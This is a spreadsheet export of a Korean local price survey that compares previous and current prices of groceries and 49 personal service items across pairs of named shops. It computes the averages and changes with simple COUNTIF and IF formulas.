A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: =COUNTIF(J28,"<>0")+COUNTIF(N28,"<>0") -> 1 | E28: =COUNTIF(K28,"<>0")+COUNTIF(O28,"<>0") -> 1 | F28: =IF(D28=0,0,SUM(J28,N28)/D28) -> 1,466 | G28: =IF(E28=0,0,SUM(K28,O28)/E28) -> 1,466 | H28: =G28-F28 -> 0 | I28: 농협하나로마트 | J28: 1,466 | K28: 1,466 | L28: =K28-J28 -> 0 | M28: 트라이얼코리아 | N28: 0 | O28: 0 | P28: =O28-N28 -> 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: =COUNTIF(J29,"<>0")+COUNTIF(N29,"<>0") -> 1 | E29: =COUNTIF(K29,"<>0")+COUNTIF(O29,"<>0") -> 1 | F29: =IF(D29=0,0,SUM(J29,N29)/D29) -> 7,500 | G29: =IF(E29=0,0,SUM(K29,O29)/E29) -> 7,000 | H29: =G29-F29 -> -500 | I29: 농협하나로마트 | J29: 7,500 | K29: 7,000 | L29: =K29-J29 -> -500 | M29: 트라이얼코리아 | N29: 0 | O29: 0 | P29: =O29-N29 -> 0
A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: =COUNTIF(J30,"<>0")+COUNTIF(N30,"<>0") -> 1 | E30: =COUNTIF(K30,"<>0")+COUNTIF(O30,"<>0") -> 1 | F30: =IF(D30=0,0,SUM(J30,N30)/D30) -> 3,800 | G30: =IF(E30=0,0,SUM(K30,O30)/E30) -> 3,800 | H30: =G30-F30 -> 0 | I30: 농협하나로마트 | J30: 3,800 | K30: 3,800 | L30: =K30-J30 -> 0 | M30: 트라이얼코리아 | N30: 0 | O30: 0 | P30: =O30-N30 -> 0
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: =COUNTIF(J31,"<>0")+COUNTIF(N31,"<>0") -> 1 | E31: =COUNTIF(K31,"<>0")+COUNTIF(O31,"<>0") -> 1 | F31: =IF(D31=0,0,SUM(J31,N31)/D31) -> 2,000 | G31: =IF(E31=0,0,SUM(K31,O31)/E31) -> 2,800 | H31: =G31-F31 -> 800 | I31: 농협하나로마트 | J31: 2,000 | K31: 2,800 | L31: =K31-J31 -> 800 | M31: 트라이얼코리아 | N31: 0 | O31: 0 | P31: =O31-N31 -> 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: =COUNTIF(J32,"<>0")+COUNTIF(N32,"<>0") -> 1 | E32: =COUNTIF(K32,"<>0")+COUNTIF(O32,"<>0") -> 1 | F32: =IF(D32=0,0,SUM(J32,N32)/D32) -> 5,000 | G32: =IF(E32=0,0,SUM(K32,O32)/E32) -> 4,700 | H32: =G32-F32 -> -300 | I32: 농협하나로마트 | J32: 5,000 | K32: 4,700 | L32: =K32-J32 -> -300 | M32: 트라이얼코리아 | N32: 0 | O32: 0 | P32: =O32-N32 -> 0
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: =COUNTIF(J33,"<>0")+COUNTIF(N33,"<>0") -> 1 | E33: =COUNTIF(K33,"<>0")+COUNTIF(O33,"<>0") -> 1 | F33: =IF(D33=0,0,SUM(J33,N33)/D33) -> 10,000 | G33: =IF(E33=0,0,SUM(K33,O33)/E33) -> 10,000 | H33: =G33-F33 -> 0 | I33: 농협하나로마트 | J33: 10,000 | K33: 10,000 | L33: =K33-J33 -> 0 | M33: 트라이얼코리아 | N33: 0 | O33: 0 | P33: =O33-N33 -> 0
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: =COUNTIF(J34,"<>0")+COUNTIF(N34,"<>0") -> 2 | E34: =COUNTIF(K34,"<>0")+COUNTIF(O34,"<>0") -> 2 | F34: =IF(D34=0,0,SUM(J34,N34)/D34) -> 90,150 | G34: =IF(E34=0,0,SUM(K34,O34)/E34) -> 99,450 | H34: =G34-F34 -> 9,300 | I34: 농협하나로마트 | J34: 96,600 | K34: 115,200 | L34: =K34-J34 -> 18600 | M34: 트라이얼코리아 | N34: 83,700 | O34: 83,700 | P34: =O34-N34 -> 0
A35: 개인서비스 요금(49개 품목) | F35: 0
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(N36,"<>0") -> 2 | E36: =COUNTIF(K36,"<>0")+COUNTIF(O36,"<>0") -> 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 9,500 | G36: =IF(E36=0,0,SUM(K36,O36)/E36) -> 9,500 | H36: 0 | I36: 함흥냉면 | J36: 9,000 | K36: 9,000 | L36: =K36-J36 -> 0 | M36: 투가리국밥 | N36: 10,000 | O36: 10,000 | P36: =O36-N36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(N37,"<>0") -> 2 | E37: =COUNTIF(K37,"<>0")+COUNTIF(O37,"<>0") -> 2 | F37: =IF(D37=0,0,SUM(J37,N37)/D37) -> 9,500 | G37: =IF(E37=0,0,SUM(K37,O37)/E37) -> 9,500 | H37: 0 | I37: 함흥냉면 | J37: 10,000 | K37: 10,000 | L37: =K37-J37 -> 0 | M37: 호호냉면 | N37: 9,000 | O37: 9,000 | P37: =O37-N37 -> 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: =COUNTIF(J38,"<>0")+COUNTIF(N38,"<>0") -> 2 | E38: =COUNTIF(K38,"<>0")+COUNTIF(O38,"<>0") -> 2 | F38: =IF(D38=0,0,SUM(J38,N38)/D38) -> 8,000 | G38: =IF(E38=0,0,SUM(K38,O38)/E38) -> 8,000 | H38: 0 | I38: 남일보리밥 | J38: 10,000 | K38: 10,000 | L38: =K38-J38 -> 0 | M38: 이파리 | N38: 6,000 | O38: 6,000 | P38: =O38-N38 -> 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: =COUNTIF(J39,"<>0")+COUNTIF(N39,"<>0") -> 2 | E39: =COUNTIF(K39,"<>0")+COUNTIF(O39,"<>0") -> 2 | F39: =IF(D39=0,0,SUM(J39,N39)/D39) -> 13,500 | G39: =IF(E39=0,0,SUM(K39,O39)/E39) -> 13,500 | H39: 0 | I39: 호호냉면 | J39: 12,000 | K39: 12,000 | L39: =K39-J39 -> 0 | M39: 투가리국밥 | N39: 15,000 | O39: 15,000 | P39: =O39-N39 -> 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: =COUNTIF(J40,"<>0")+COUNTIF(N40,"<>0") -> 2 | E40: =COUNTIF(K40,"<>0")+COUNTIF(O40,"<>0") -> 2 | F40: =IF(D40=0,0,SUM(J40,N40)/D40) -> 13,500 | G40: =IF(E40=0,0,SUM(K40,O40)/E40) -> 13,500 | H40: =G40-F40 -> 0 | I40: 고려삼계탕 | J40: 14,000 | K40: 14,000 | L40: =K40-J40 -> 0 | M40: 마로정 | N40: 13,000 | O40: 13,000 | P40: =O40-N40 -> 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: =COUNTIF(J41,"<>0")+COUNTIF(N41,"<>0") -> 2 | E41: =COUNTIF(K41,"<>0")+COUNTIF(O41,"<>0") -> 2 | F41: =IF(D41=0,0,SUM(J41,N41)/D41) -> 7,750 | G41: =IF(E41=0,0,SUM(K41,O41)/E41) -> 7,750 | H41: =G41-F41 -> 0 | I41: 낙지뻘식당 | J41: 9,000 | K41: 9,000 | L41: =K41-J41 -> 0 | M41: 이파리 | N41: 6,500 | O41: 6,500 | P41: =O41-N41 -> 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: =COUNTIF(J42,"<>0")+COUNTIF(N42,"<>0") -> 2 | E42: =COUNTIF(K42,"<>0")+COUNTIF(O42,"<>0") -> 2 | F42: =IF(D42=0,0,SUM(J42,N42)/D42) -> 7,750 | G42: =IF(E42=0,0,SUM(K42,O42)/E42) -> 7,750 | H42: =G42-F42 -> 0 | I42: 낙지뻘식당 | J42: 9,000 | K42: 9,000 | L42: =K42-J42 -> 0 | M42: 이파리 | N42: 6,500 | O42: 6,500 | P42: =O42-N42 -> 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: =COUNTIF(J43,"<>0")+COUNTIF(N43,"<>0") -> 2 | E43: =COUNTIF(K43,"<>0")+COUNTIF(O43,"<>0") -> 2 | F43: =IF(D43=0,0,SUM(J43,N43)/D43) -> 29,222 | G43: =IF(E43=0,0,SUM(K43,O43)/E43) -> 29,222 | H43: =G43-F43 -> 0 | I43: 시내식당 | J43: 27,777 | K43: 27,777 | L43: =K43-J43 -> 0 | M43: 광양숯불고기 | N43: 30,666 | O43: 30,666 | P43: =O43-N43 -> 0
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: =COUNTIF(J44,"<>0")+COUNTIF(N44,"<>0") -> 2 | E44: =COUNTIF(K44,"<>0")+COUNTIF(O44,"<>0") -> 2 | F44: =IF(D44=0,0,SUM(J44,N44)/D44) -> 42,000 | G44: =IF(E44=0,0,SUM(K44,O44)/E44) -> 42,000 | H44: =G44-F44 -> 0 | I44: 화담정 | J44: 33,333 | K44: 33,333 | L44: =K44-J44 -> 0 | M44: 순한우촌 | N44: 50,666 | O44: 50,666 | P44: =O44-N44 -> 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: =COUNTIF(J45,"<>0")+COUNTIF(N45,"<>0") -> 1 | E45: =COUNTIF(K45,"<>0")+COUNTIF(O45,"<>0") -> 1 | F45: =IF(D45=0,0,SUM(J45,N45)/D45) -> 17,000 | G45: =IF(E45=0,0,SUM(K45,O45)/E45) -> 17,000 | H45: =G45-F45 -> 0 | I45: 초밥이야기 | J45: 17,000 | K45: 17,000 | L45: =K45-J45 -> 0 | N45: 0 | O45: 0 | P45: =O45-N45 -> 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: =COUNTIF(J46,"<>0")+COUNTIF(N46,"<>0") -> 2 | E46: =COUNTIF(K46,"<>0")+COUNTIF(O46,"<>0") -> 2 | F46: =IF(D46=0,0,SUM(J46,N46)/D46) -> 18,500 | G46: =IF(E46=0,0,SUM(K46,O46)/E46) -> 18,500 | H46: =G46-F46 -> 0 | I46: 처가집치킨 | J46: 19,000 | K46: 19,000 | L46: =K46-J46 -> 0 | M46: 굽네치킨 | N46: 18,000 | O46: 18,000 | P46: =O46-N46 -> 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: =COUNTIF(J47,"<>0")+COUNTIF(N47,"<>0") -> 2 | E47: =COUNTIF(K47,"<>0")+COUNTIF(O47,"<>0") -> 2 | F47: =IF(D47=0,0,SUM(J47,N47)/D47) -> 7,500 | G47: =IF(E47=0,0,SUM(K47,O47)/E47) -> 7,500 | H47: =G47-F47 -> 0 | I47: 만나칼국수 | J47: 8,000 | K47: 8,000 | L47: =K47-J47 -> 0 | M47: 화영칼국수 | N47: 7,000 | O47: 7,000 | P47: =O47-N47 -> 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: =COUNTIF(J48,"<>0")+COUNTIF(N48,"<>0") -> 2 | E48: =COUNTIF(K48,"<>0")+COUNTIF(O48,"<>0") -> 2 | F48: =IF(D48=0,0,SUM(J48,N48)/D48) -> 4,250 | G48: =IF(E48=0,0,SUM(K48,O48)/E48) -> 4,250 | H48: =G48-F48 -> 0 | I48: 정가네김밥 | J48: 4,500 | K48: 4,500 | L48: =K48-J48 -> 0 | M48: 이파리 | N48: 4,000 | O48: 4,000 | P48: =O48-N48 -> 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: =COUNTIF(J49,"<>0")+COUNTIF(N49,"<>0") -> 2 | E49: =COUNTIF(K49,"<>0")+COUNTIF(O49,"<>0") -> 2 | F49: =IF(D49=0,0,SUM(J49,N49)/D49) -> 3,000 | G49: =IF(E49=0,0,SUM(K49,O49)/E49) -> 3,000 | H49: =G49-F49 -> 0 | I49: 정가네김밥 | J49: 3,500 | K49: 3,500 | L49: =K49-J49 -> 0 | M49: 이파리 | N49: 2,500 | O49: 2,500 | P49: =O49-N49 -> 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: =COUNTIF(J50,"<>0")+COUNTIF(N50,"<>0") -> 2 | E50: =COUNTIF(K50,"<>0")+COUNTIF(O50,"<>0") -> 2 | F50: =IF(D50=0,0,SUM(J50,N50)/D50) -> 6,000 | G50: =IF(E50=0,0,SUM(K50,O50)/E50) -> 6,000 | H50: =G50-F50 -> 0 | I50: 연경 | J50: 6,000 | K50: 6,000 | L50: =K50-J50 -> 0 | M50: 청해루 | N50: 6,000 | O50: 6,000 | P50: =O50-N50 -> 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: =COUNTIF(J51,"<>0")+COUNTIF(N51,"<>0") -> 2 | E51: =COUNTIF(K51,"<>0")+COUNTIF(O51,"<>0") -> 2 | F51: =IF(D51=0,0,SUM(J51,N51)/D51) -> 8,000 | G51: =IF(E51=0,0,SUM(K51,O51)/E51) -> 8,000 | H51: =G51-F51 -> 0 | I51: 연경 | J51: 8,000 | K51: 8,000 | L51: =K51-J51 -> 0 | M51: 청해루 | N51: 8,000 | O51: 8,000 | P51: =O51-N51 -> 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: =COUNTIF(J52,"<>0")+COUNTIF(N52,"<>0") -> 2 | E52: =COUNTIF(K52,"<>0")+COUNTIF(O52,"<>0") -> 2 | F52: =IF(D52=0,0,SUM(J52,N52)/D52) -> 21,000 | G52: =IF(E52=0,0,SUM(K52,O52)/E52) -> 21,000 | H52: =G52-F52 -> 0 | I52: 연경 | J52: 22,000 | K52: 22,000 | L52: =K52-J52 -> 0 | M52: 청해루 | N52: 20,000 | O52: 20,000 | P52: =O52-N52 -> 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: =COUNTIF(J53,"<>0")+COUNTIF(N53,"<>0") -> 2 | E53: =COUNTIF(K53,"<>0")+COUNTIF(O53,"<>0") -> 2 | F53: =IF(D53=0,0,SUM(J53,N53)/D53) -> 9,000 | G53: =IF(E53=0,0,SUM(K53,O53)/E53) -> 9,000 | H53: =G53-F53 -> 0 | I53: 행복돈가스 | J53: 9,000 | K53: 9,000 | L53: =K53-J53 -> 0 | M53: 마로정 | N53: 9,000 | O53: 9,000 | P53: =O53-N53 -> 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: =COUNTIF(J54,"<>0")+COUNTIF(N54,"<>0") -> 2 | E54: =COUNTIF(K54,"<>0")+COUNTIF(O54,"<>0") -> 2 | F54: =IF(D54=0,0,SUM(J54,N54)/D54) -> 3,550 | G54: =IF(E54=0,0,SUM(K54,O54)/E54) -> 3,550 | H54: =G54-F54 -> 0 | I54: 맘스터치 | J54: 3,900 | K54: 3,900 | L54: =K54-J54 -> 0 | M54: 트라이얼코리아 | N54: 3,200 | O54: 3,200 | P54: =O54-N54 -> 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: =COUNTIF(J55,"<>0")+COUNTIF(N55,"<>0") -> 2 | E55: =COUNTIF(K55,"<>0")+COUNTIF(O55,"<>0") -> 2 | F55: =IF(D55=0,0,SUM(J55,N55)/D55) -> 18,400 | G55: =IF(E55=0,0,SUM(K55,O55)/E55) -> 18,400 | H55: =G55-F55 -> 0 | I55: 청년피자 | J55: 18,900 | K55: 18,900 | L55: =K55-J55 -> 0 | M55: 피자가 기가막혀 | N55: 17,900 | O55: 17,900 | P55: =O55-N55 -> 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: =COUNTIF(J56,"<>0")+COUNTIF(N56,"<>0") -> 2 | E56: =COUNTIF(K56,"<>0")+COUNTIF(O56,"<>0") -> 2 | F56: =IF(D56=0,0,SUM(J56,N56)/D56) -> 3,000 | G56: =IF(E56=0,0,SUM(K56,O56)/E56) -> 3,000 | H56: =G56-F56 -> 0 | I56: 토프레소(창덕) | J56: 3,000 | K56: 3,000 | L56: =K56-J56 -> 0 | M56: 요거프레소 | N56: 3,000 | O56: 3,000 | P56: =O56-N56 -> 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: =COUNTIF(J57,"<>0")+COUNTIF(N57,"<>0") -> 2 | E57: =COUNTIF(K57,"<>0")+COUNTIF(O57,"<>0") -> 2 | F57: =IF(D57=0,0,SUM(J57,N57)/D57) -> 3,900 | G57: =IF(E57=0,0,SUM(K57,O57)/E57) -> 3,900 | H57: =G57-F57 -> 0 | I57: 토프레소(창덕) | J57: 4,000 | K57: 4,000 | L57: =K57-J57 -> 0 | M57: 요거프레소 | N57: 3,800 | O57: 3,800 | P57: =O57-N57 -> 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: =COUNTIF(J58,"<>0")+COUNTIF(N58,"<>0") -> 2 | E58: =COUNTIF(K58,"<>0")+COUNTIF(O58,"<>0") -> 2 | F58: =IF(D58=0,0,SUM(J58,N58)/D58) -> 15,250 | G58: =IF(E58=0,0,SUM(K58,O58)/E58) -> 15,250 | H58: =G58-F58 -> 0 | I58: 헌라산식당 | J58: 15,000 | K58: 15,000 | L58: =K58-J58 -> 0 | M58: 수림정 | N58: 15,500 | O58: 15,500 | P58: =O58-N58 -> 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: =COUNTIF(J59,"<>0")+COUNTIF(N59,"<>0") -> 2 | E59: =COUNTIF(K59,"<>0")+COUNTIF(O59,"<>0") -> 2 | F59: =IF(D59=0,0,SUM(J59,N59)/D59) -> 14,500 | G59: =IF(E59=0,0,SUM(K59,O59)/E59) -> 14,500 | H59: =G59-F59 -> 0 | I59: 한라산식당 | J59: 15,000 | K59: 15,000 | L59: =K59-J59 -> 0 | M59: 수림정 | N59: 14,000 | O59: 14,000 | P59: =O59-N59 -> 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: =COUNTIF(J60,"<>0")+COUNTIF(N60,"<>0") -> 0 | E60: =COUNTIF(K60,"<>0")+COUNTIF(O60,"<>0") -> 0 | F60: =IF(D60=0,0,SUM(J60,N60)/D60) -> 0 | G60: =IF(E60=0,0,SUM(K60,O60)/E60) -> 0 | H60: =G60-F60 -> 0 | I60: 매실한우 | J60: 0 | K60: 0 | L60: =K60-J60 -> 0 | M60: 삼대불고기 | N60: 0 | O60: 0 | P60: =O60-N60 -> 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: =COUNTIF(J61,"<>0")+COUNTIF(N61,"<>0") -> 2 | E61: =COUNTIF(K61,"<>0")+COUNTIF(O61,"<>0") -> 2 | F61: =IF(D61=0,0,SUM(J61,N61)/D61) -> 4,000 | G61: =IF(E61=0,0,SUM(K61,O61)/E61) -> 4,000 | H61: =G61-F61 -> 0 | I61: 투모아 | J61: 4,000 | K61: 4,000 | L61: =K61-J61 -> 0 | M61: 꼬치이야기 | N61: 4,000 | O61: 4,000 | P61: =O61-N61 -> 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 17평1개월 (공과금 제외) | D62: =COUNTIF(J62,"<>0")+COUNTIF(N62,"<>0") -> 1 | E62: =COUNTIF(K62,"<>0")+COUNTIF(O62,"<>0") -> 1 | F62: =IF(D62=0,0,SUM(J62,N62)/D62) -> 52,000 | G62: =IF(E62=0,0,SUM(K62,O62)/E62) -> 52,000 | H62: =G62-F62 -> 0 | I62: 목성아파트 | J62: 52,000 | K62: 52,000 | L62: =K62-J62 -> 0 | N62: 0 | O62: 0 | P62: =O62-N62 -> 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: =COUNTIF(J63,"<>0")+COUNTIF(N63,"<>0") -> 2 | E63: =COUNTIF(K63,"<>0")+COUNTIF(O63,"<>0") -> 2 | F63: =IF(D63=0,0,SUM(J63,N63)/D63) -> 8,000 | G63: =IF(E63=0,0,SUM(K63,O63)/E63) -> 8,000 | H63: =G63-F63 -> 0 | I63: 서울세탁소 | J63: 9,000 | K63: 9,000 | L63: =K63-J63 -> 0 | M63: 때빼때세탁소 | N63: 7,000 | O63: 7,000 | P63: =O63-N63 -> 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: =COUNTIF(J64,"<>0")+COUNTIF(N64,"<>0") -> 2 | E64: =COUNTIF(K64,"<>0")+COUNTIF(O64,"<>0") -> 2 | F64: =IF(D64=0,0,SUM(J64,N64)/D64) -> 4,500 | G64: =IF(E64=0,0,SUM(K64,O64)/E64) -> 4,500 | H64: =G64-F64 -> 0 | I64: 서울세탁소 | J64: 4,000 | K64: 4,000 | L64: =K64-J64 -> 0 | M64: 때빼때세탁소 | N64: 5,000 | O64: 5,000 | P64: =O64-N64 -> 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: =COUNTIF(J65,"<>0")+COUNTIF(N65,"<>0") -> 1 | E65: =COUNTIF(K65,"<>0")+COUNTIF(O65,"<>0") -> 1 | F65: =IF(D65=0,0,SUM(J65,N65)/D65) -> 13,000 | G65: =IF(E65=0,0,SUM(K65,O65)/E65) -> 13,000 | H65: =G65-F65 -> 0 | J65: 13000 | K65: 13000 | L65: =K65-J65 -> 0 | N65: 0 | O65: 0 | P65: =O65-N65 -> 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: =COUNTIF(J66,"<>0")+COUNTIF(N66,"<>0") -> 0 | E66: =COUNTIF(K66,"<>0")+COUNTIF(O66,"<>0") -> 0 | F66: =IF(D66=0,0,SUM(J66,N66)/D66) -> 0 | G66: =IF(E66=0,0,SUM(K66,O66)/E66) -> 0 | H66: =G66-F66 -> 0 | J66: 0 | K66: 0 | L66: =K66-J66 -> 0 | N66: 0 | O66: 0 | P66: =O66-N66 -> 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: =COUNTIF(J67,"<>0")+COUNTIF(N67,"<>0") -> 1 | E67: =COUNTIF(K67,"<>0")+COUNTIF(O67,"<>0") -> 1 | F67: =IF(D67=0,0,SUM(J67,N67)/D67) -> 3,500 | G67: =IF(E67=0,0,SUM(K67,O67)/E67) -> 3,500 | H67: =G67-F67 -> 0 | I67: 광양수영장 | J67: 3500 | K67: 3500 | L67: =K67-J67 -> 0 | N67: 0 | O67: 0 | P67: =O67-N67 -> 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: =COUNTIF(J68,"<>0")+COUNTIF(N68,"<>0") -> 1 | E68: =COUNTIF(K68,"<>0")+COUNTIF(O68,"<>0") -> 1 | F68: =IF(D68=0,0,SUM(J68,N68)/D68) -> 4,000 | G68: =IF(E68=0,0,SUM(K68,O68)/E68) -> 4,000 | H68: =G68-F68 -> 0 | I68: 월드볼링장 | J68: 4,000 | K68: 4,000 | L68: =K68-J68 -> 0 | N68: 0 | O68: 0 | P68: =O68-N68 -> 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: =COUNTIF(J69,"<>0")+COUNTIF(N69,"<>0") -> 1 | E69: =COUNTIF(K69,"<>0")+COUNTIF(O69,"<>0") -> 1 | F69: =IF(D69=0,0,SUM(J69,N69)/D69) -> 100,000 | G69: =IF(E69=0,0,SUM(K69,O69)/E69) -> 100,000 | H69: =G69-F69 -> 0 | I69: 창성골프연습장 | J69: 100,000 | K69: 100,000 | L69: =K69-J69 -> 0 | N69: 0 | O69: 0 | P69: =O69-N69 -> 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: =COUNTIF(J70,"<>0")+COUNTIF(N70,"<>0") -> 2 | E70: =COUNTIF(K70,"<>0")+COUNTIF(O70,"<>0") -> 2 | F70: =IF(D70=0,0,SUM(J70,N70)/D70) -> 25,000 | G70: =IF(E70=0,0,SUM(K70,O70)/E70) -> 25,000 | H70: =G70-F70 -> 0 | I70: 매화노래방 | J70: 25,000 | K70: 25,000 | L70: =K70-J70 -> 0 | M70: 고래고래노래방 | N70: 25,000 | O70: 25,000 | P70: =O70-N70 -> 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: =COUNTIF(J71,"<>0")+COUNTIF(N71,"<>0") -> 2 | E71: =COUNTIF(K71,"<>0")+COUNTIF(O71,"<>0") -> 2 | F71: =IF(D71=0,0,SUM(J71,N71)/D71) -> 9,000 | G71: =IF(E71=0,0,SUM(K71,O71)/E71) -> 9,000 | H71: =G71-F71 -> 0 | I71: 퀸당구장 | J71: 9,000 | K71: 9,000 | L71: =K71-J71 -> 0 | M71: 굿당당구장 | N71: 9,000 | O71: 9,000 | P71: =O71-N71 -> 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: =COUNTIF(J72,"<>0")+COUNTIF(N72,"<>0") -> 2 | E72: =COUNTIF(K72,"<>0")+COUNTIF(O72,"<>0") -> 2 | F72: =IF(D72=0,0,SUM(J72,N72)/D72) -> 22,500 | G72: =IF(E72=0,0,SUM(K72,O72)/E72) -> 22,500 | H72: =G72-F72 -> 0 | I72: 니콘사진관 | J72: 20,000 | K72: 20,000 | L72: =K72-J72 -> 0 | M72: 신가스튜디오 | N72: 25,000 | O72: 25,000 | P72: =O72-N72 -> 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: =COUNTIF(J73,"<>0")+COUNTIF(N73,"<>0") -> 2 | E73: =COUNTIF(K73,"<>0")+COUNTIF(O73,"<>0") -> 2 | F73: =IF(D73=0,0,SUM(J73,N73)/D73) -> 400 | G73: =IF(E73=0,0,SUM(K73,O73)/E73) -> 400 | H73: =G73-F73 -> 0 | I73: 니콘사진관 | J73: 300 | K73: 300 | L73: =K73-J73 -> 0 | M73: 신가스튜디오 | N73: 500 | O73: 500 | P73: =O73-N73 -> 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: =COUNTIF(J74,"<>0")+COUNTIF(N74,"<>0") -> 0 | E74: =COUNTIF(K74,"<>0")+COUNTIF(O74,"<>0") -> 0 | F74: =IF(D74=0,0,SUM(J74,N74)/D74) -> 0 | G74: =IF(E74=0,0,SUM(K74,O74)/E74) -> 0 | H74: =G74-F74 -> 0 | J74: 0 | K74: 0 | L74: =K74-J74 -> 0 | N74: 0 | O74: 0 | P74: =O74-N74 -> 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: =COUNTIF(J75,"<>0")+COUNTIF(N75,"<>0") -> 2 | E75: =COUNTIF(K75,"<>0")+COUNTIF(O75,"<>0") -> 2 | F75: =IF(D75=0,0,SUM(J75,N75)/D75) -> 15,000 | G75: =IF(E75=0,0,SUM(K75,O75)/E75) -> 15,000 | H75: =G75-F75 -> 0 | I75: 광양이용원 | J75: 15,000 | K75: 15,000 | L75: =K75-J75 -> 0 | M75: 늘푸른이용원 | N75: 15,000 | O75: 15,000 | P75: =O75-N75 -> 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: =COUNTIF(J76,"<>0")+COUNTIF(N76,"<>0") -> 2 | E76: =COUNTIF(K76,"<>0")+COUNTIF(O76,"<>0") -> 2 | F76: =IF(D76=0,0,SUM(J76,N76)/D76) -> 45,000 | G76: =IF(E76=0,0,SUM(K76,O76)/E76) -> 45,000 | H76: =G76-F76 -> 0 | I76: 리헤어피카소 | J76: 50,000 | K76: 50,000 | L76: =K76-J76 -> 0 | M76: 지샾미용실 | N76: 40,000 | O76: 40,000 | P76: =O76-N76 -> 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: =COUNTIF(J77,"<>0")+COUNTIF(N77,"<>0") -> 2 | E77: =COUNTIF(K77,"<>0")+COUNTIF(O77,"<>0") -> 2 | F77: =IF(D77=0,0,SUM(J77,N77)/D77) -> 7,000 | G77: =IF(E77=0,0,SUM(K77,O77)/E77) -> 7,000 | H77: =G77-F77 -> 0 | I77: 삼보천 | J77: 7,000 | K77: 7,000 | L77: =K77-J77 -> 0 | M77: 밭샘사우나 | N77: 7,000 | O77: 7,000 | P77: =O77-N77 -> 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: =COUNTIF(J78,"<>0")+COUNTIF(N78,"<>0") -> 0 | E78: =COUNTIF(K78,"<>0")+COUNTIF(O78,"<>0") -> 0 | F78: =IF(D78=0,0,SUM(J78,N78)/D78) -> 0 | G78: =IF(E78=0,0,SUM(K78,O78)/E78) -> 0 | H78: =G78-F78 -> 0 | J78: 0 | K78: 0 | L78: =K78-J78 -> 0 | N78: 0 | O78: 0 | P78: =O78-N78 -> 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: =COUNTIF(J79,"<>0")+COUNTIF(N79,"<>0") -> 2 | E79: =COUNTIF(K79,"<>0")+COUNTIF(O79,"<>0") -> 2 | F79: =IF(D79=0,0,SUM(J79,N79)/D79) -> 37,500 | G79: =IF(E79=0,0,SUM(K79,O79)/E79) -> 37,500 | H79: =G79-F79 -> 0 | I79: 대산모텔 | J79: 35,000 | K79: 35,000 | L79: =K79-J79 -> 0 | M79: 타워모텔 | N79: 40,000 | O79: 40,000 | P79: =O79-N79 -> 0
